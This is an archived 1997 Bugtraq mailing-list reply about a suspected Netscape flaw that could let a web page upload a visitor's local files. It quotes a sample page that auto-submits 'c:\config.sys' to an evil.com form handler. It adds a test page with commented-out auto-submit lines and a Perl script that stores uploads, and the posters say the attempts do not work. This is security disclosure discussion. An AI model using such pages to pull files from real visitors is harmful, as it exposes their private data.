[4694] in bugtraq
Re: Netscape Exploit
daemon@ATHENA.MIT.EDU (Micah Brandon)
Sat Jun 14 22:38:58 1997
Date: Sat, 14 Jun 1997 19:57:55 -0400
Reply-To: Micah Brandon <brandon@VV.COM>
From: Micah Brandon <brandon@VV.COM>
X-To: root <root@BACKWATER.PBX.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.93.970614192039.1693A-200000@backwater.pbx.org>
At 07:21 PM 6/14/97 -0500, root wrote:
>Here is a sample it isn't complete but you get the basic idea of what is
>going on
><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
>
><BODY onLoad="daForm.submit()">
><FORM
> NAME="daForm"
> ACTION="http://evil.com/cgi-bin/formmail.pl"
> METHOD=POST>
>
><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
>Harddrive">
><INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">
>
>and so on and so forth...
Ah....this won't work because you're onLoad'ing daForm before you've named
the form "daForm" plus the <INPUT TYPE=FILE...> line won't take a VALUE
attribute.
I've been hackin' at this, but I can't get it either. I can "see" the
value attribute being set but I don't think it's possible to change it with
Javascript. We're probably barking up the wrong tree. Anyway, take a look
at the code below. Perhaps someone can take it from here:
<HTML>
<HEAD>
<SCRIPT>
function ShowFilename() {
// Uncomment this line and comment the alert line if you want this
// script to "auto" submit
// document.forms[0].submit();
// Display filename
alert(document.forms[0].userfile.value);
}
</SCRIPT>
<TITLE>
Netscape Bug Test Page
</TITLE>
<BODY>
<CENTER>
<H2>Netscape Bug Test Page</H2>
<HR>
<FORM OnSubmit="ShowFilename()"
ACTION="send.cgi"
ENCTYPE="multipart/form-data"
METHOD="POST">
<INPUT TYPE=FILE NAME=userfile>
<INPUT TYPE=SUBMIT VALUE="Send File">
</FORM>
<!-- Uncomment this IMG SRC line to have the loading
of an image trigger the ShowFilename script.
Together with uncommenting the submit() line
in the ShowFilename script, the form above will
submit itself automatically.
<IMG OnLoad="ShowFilename()" SRC="pix.gif">
-->
<HR>
</CENTER>
</BODY>
</HTML>
And send.cgi is...
#!/usr/bin/perl
# Header
print "Context-type: text/html\n\n";
print "<H2>YOUR FILE</H2>";
print "<PRE>";
while (<STDIN>) {
$FILETEXT .= $_;
print;
}
print "</PRE>";
# Save the file to your server as well
open(SOMEFILE, "> /tmp/fromweb");
print SOMEFILE $FILETEXT;
close(SOMEFILE);
---
micah
brandon@vv.com
